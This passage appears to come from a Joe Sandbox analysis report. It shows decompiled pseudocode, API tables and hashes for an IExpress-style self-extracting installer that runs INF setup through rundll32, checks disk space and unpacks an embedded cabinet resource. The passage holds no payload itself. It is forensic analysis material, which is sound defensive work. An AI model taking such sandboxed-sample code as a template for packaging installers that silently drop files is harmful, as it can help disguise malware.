                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0xa49120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa41140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0xa49a34 =  *0xa49a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0xa49a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E00A4171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0xa49a34 =  *0xa49a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E00A41680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E00A41680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E00A46CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a41dbe
                                                                                                                                                                                                                                            0x00a41dc3
                                                                                                                                                                                                                                            0x00a41dce
                                                                                                                                                                                                                                            0x00a41dd2
                                                                                                                                                                                                                                            0x00a41deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41dd2
                                                                                                                                                                                                                                            0x00a41bf7
                                                                                                                                                                                                                                            0x00a41bfe
                                                                                                                                                                                                                                            0x00a41c07
                                                                                                                                                                                                                                            0x00a41d55
                                                                                                                                                                                                                                            0x00a41d5a
                                                                                                                                                                                                                                            0x00a41d5b
                                                                                                                                                                                                                                            0x00a41d5d
                                                                                                                                                                                                                                            0x00a41d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41c1b
                                                                                                                                                                                                                                            0x00a41c1b
                                                                                                                                                                                                                                            0x00a41c20
                                                                                                                                                                                                                                            0x00a41c2c
                                                                                                                                                                                                                                            0x00a41c33
                                                                                                                                                                                                                                            0x00a41c38
                                                                                                                                                                                                                                            0x00a41c3a
                                                                                                                                                                                                                                            0x00a41c3a
                                                                                                                                                                                                                                            0x00a41c40
                                                                                                                                                                                                                                            0x00a41c4b
                                                                                                                                                                                                                                            0x00a41c4b
                                                                                                                                                                                                                                            0x00a41c5d
                                                                                                                                                                                                                                            0x00a41c61
                                                                                                                                                                                                                                            0x00a41dd4
                                                                                                                                                                                                                                            0x00a41dd4
                                                                                                                                                                                                                                            0x00a41dd6
                                                                                                                                                                                                                                            0x00a41ddb
                                                                                                                                                                                                                                            0x00a41ddc
                                                                                                                                                                                                                                            0x00a41dde
                                                                                                                                                                                                                                            0x00a41d64
                                                                                                                                                                                                                                            0x00a41d64
                                                                                                                                                                                                                                            0x00a41d67
                                                                                                                                                                                                                                            0x00a41d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41c67
                                                                                                                                                                                                                                            0x00a41c67
                                                                                                                                                                                                                                            0x00a41c6d
                                                                                                                                                                                                                                            0x00a41c72
                                                                                                                                                                                                                                            0x00a41c74
                                                                                                                                                                                                                                            0x00a41c74
                                                                                                                                                                                                                                            0x00a41c8e
                                                                                                                                                                                                                                            0x00a41c99
                                                                                                                                                                                                                                            0x00a41cc0
                                                                                                                                                                                                                                            0x00a41cf8
                                                                                                                                                                                                                                            0x00a41d07
                                                                                                                                                                                                                                            0x00a41d23
                                                                                                                                                                                                                                            0x00a41d09
                                                                                                                                                                                                                                            0x00a41d14
                                                                                                                                                                                                                                            0x00a41d1b
                                                                                                                                                                                                                                            0x00a41d1b
                                                                                                                                                                                                                                            0x00a41d2b
                                                                                                                                                                                                                                            0x00a41d2d
                                                                                                                                                                                                                                            0x00a41d2d
                                                                                                                                                                                                                                            0x00a41d38
                                                                                                                                                                                                                                            0x00a41d39
                                                                                                                                                                                                                                            0x00a41d46
                                                                                                                                                                                                                                            0x00a41cc2
                                                                                                                                                                                                                                            0x00a41cc2
                                                                                                                                                                                                                                            0x00a41ccc
                                                                                                                                                                                                                                            0x00a41cce
                                                                                                                                                                                                                                            0x00a41cce
                                                                                                                                                                                                                                            0x00a41cdb
                                                                                                                                                                                                                                            0x00a41ce6
                                                                                                                                                                                                                                            0x00a41cee
                                                                                                                                                                                                                                            0x00a41cee
                                                                                                                                                                                                                                            0x00a41e89
                                                                                                                                                                                                                                            0x00a41e91
                                                                                                                                                                                                                                            0x00a41e92
                                                                                                                                                                                                                                            0x00a41e94
                                                                                                                                                                                                                                            0x00a41e97
                                                                                                                                                                                                                                            0x00a41ea4
                                                                                                                                                                                                                                            0x00a41ea4
                                                                                                                                                                                                                                            0x00a41c61
                                                                                                                                                                                                                                            0x00a41c07
                                                                                                                                                                                                                                            0x00a41bd3
                                                                                                                                                                                                                                            0x00a41b7b

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A41BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A41BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A41C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00A41C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A41140,00000000,00000008,?), ref: 00A41CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00A41D1B
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-3368923722
                                                                                                                                                                                                                                            • Opcode ID: 76a0cb42115743904d667aad99a5f1ce1ce846ffa2793dbaf35844764b97586b
                                                                                                                                                                                                                                            • Instruction ID: 1607f65f36a05243515e118483dfafe0b7786047770689486cf3c2c60701ef0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a0cb42115743904d667aad99a5f1ce1ce846ffa2793dbaf35844764b97586b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92A14CBCA402186BEB20DB28CC45FEA7769EBD6310F1407A9E555A32C1DBB19DC6CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E00A4597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E00A444B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0xa49a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0xa49a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0xa49a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0xa489e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0xa49124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E00A4268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0xa49a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0xa489e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa489e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0xa49a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E00A444B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E00A46CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            0x00a45ae9
                                                                                                                                                                                                                                            0x00a45aeb
                                                                                                                                                                                                                                            0x00a45af0
                                                                                                                                                                                                                                            0x00a45af6
                                                                                                                                                                                                                                            0x00a45af8
                                                                                                                                                                                                                                            0x00a45af9
                                                                                                                                                                                                                                            0x00a45af9
                                                                                                                                                                                                                                            0x00a45afb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45afd
                                                                                                                                                                                                                                            0x00a45aff
                                                                                                                                                                                                                                            0x00a45b00
                                                                                                                                                                                                                                            0x00a45b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b03
                                                                                                                                                                                                                                            0x00a45b05
                                                                                                                                                                                                                                            0x00a45b08
                                                                                                                                                                                                                                            0x00a45b20
                                                                                                                                                                                                                                            0x00a45b27
                                                                                                                                                                                                                                            0x00a45b52
                                                                                                                                                                                                                                            0x00a45b52
                                                                                                                                                                                                                                            0x00a45b5b
                                                                                                                                                                                                                                            0x00a45b62
                                                                                                                                                                                                                                            0x00a45b6b
                                                                                                                                                                                                                                            0x00a45b6d
                                                                                                                                                                                                                                            0x00a45b76
                                                                                                                                                                                                                                            0x00a45b7d
                                                                                                                                                                                                                                            0x00a45b83
                                                                                                                                                                                                                                            0x00a45b7f
                                                                                                                                                                                                                                            0x00a45b7f
                                                                                                                                                                                                                                            0x00a45b7f
                                                                                                                                                                                                                                            0x00a45b6f
                                                                                                                                                                                                                                            0x00a45b72
                                                                                                                                                                                                                                            0x00a45b72
                                                                                                                                                                                                                                            0x00a45b85
                                                                                                                                                                                                                                            0x00a45b98
                                                                                                                                                                                                                                            0x00a45b9e
                                                                                                                                                                                                                                            0x00a45b87
                                                                                                                                                                                                                                            0x00a45b8f
                                                                                                                                                                                                                                            0x00a45b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b85
                                                                                                                                                                                                                                            0x00a45b29
                                                                                                                                                                                                                                            0x00a45b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b35
                                                                                                                                                                                                                                            0x00a45b48
                                                                                                                                                                                                                                            0x00a45b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b4a
                                                                                                                                                                                                                                            0x00a45b0f
                                                                                                                                                                                                                                            0x00a45b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45b16
                                                                                                                                                                                                                                            0x00a45a7c
                                                                                                                                                                                                                                            0x00a45a8a
                                                                                                                                                                                                                                            0x00a45aa5
                                                                                                                                                                                                                                            0x00a45aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a459bb
                                                                                                                                                                                                                                            0x00a459c0
                                                                                                                                                                                                                                            0x00a459c7
                                                                                                                                                                                                                                            0x00a459d1
                                                                                                                                                                                                                                            0x00a459d6
                                                                                                                                                                                                                                            0x00a45c05
                                                                                                                                                                                                                                            0x00a45c14
                                                                                                                                                                                                                                            0x00a45c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A459A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A459AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A45A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00A45A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A45A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A45A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A45A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A45AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A45BFC
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: 758131ece2fdc758bdd836d127b2a9f2072460e7a4b4a8918e8470628340b43b
                                                                                                                                                                                                                                            • Instruction ID: c69615aa332e1947a8a9d17218cbb0633b31a91740aa4b5735e02933eb488f45
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 758131ece2fdc758bdd836d127b2a9f2072460e7a4b4a8918e8470628340b43b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F71A2B990060CAFEB25DBA4DC85BFB77BCEBC9344F0441A9F40592141EB719E868B21
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 374 a44fe0-a4501a call a4468f FindResourceA LoadResource LockResource 377 a45020-a45027 374->377 378 a45161-a45163 374->378 379 a45057-a4505e call a44efd 377->379 380 a45029-a45051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 a45060-a45077 call a444b9 379->383 384 a4507c-a450b4 379->384 380->379 388 a45107-a4510e 383->388 389 a450b6-a450da 384->389 390 a450e8-a45104 call a444b9 384->390 392 a45110-a45117 FreeResource 388->392 393 a4511d-a4511f 388->393 400 a45106 389->400 401 a450dc 389->401 390->400 392->393 396 a45121-a45127 393->396 397 a4513a-a45141 393->397 396->397 402 a45129-a45135 call a444b9 396->402 398 a45143-a4514a 397->398 399 a4515f 397->399 398->399 403 a4514c-a45159 SendMessageA 398->403 399->378 400->388 405 a450e3-a450e6 401->405 402->397 403->399 405->390 405->400
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A44FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0xa49144 = E00A4468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0xa49140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0xa48584, 0x841), 5); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E00A44EFD(0, 0); // executed
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E00A44CA0, E00A44CC0, E00A44980, E00A44A50, E00A44AD0, E00A44B60, E00A44BC0, 1, 0xa49148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0xa49148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            						E00A444B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0xa41140, 0, E00A44CD0, 0, 0xa49140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
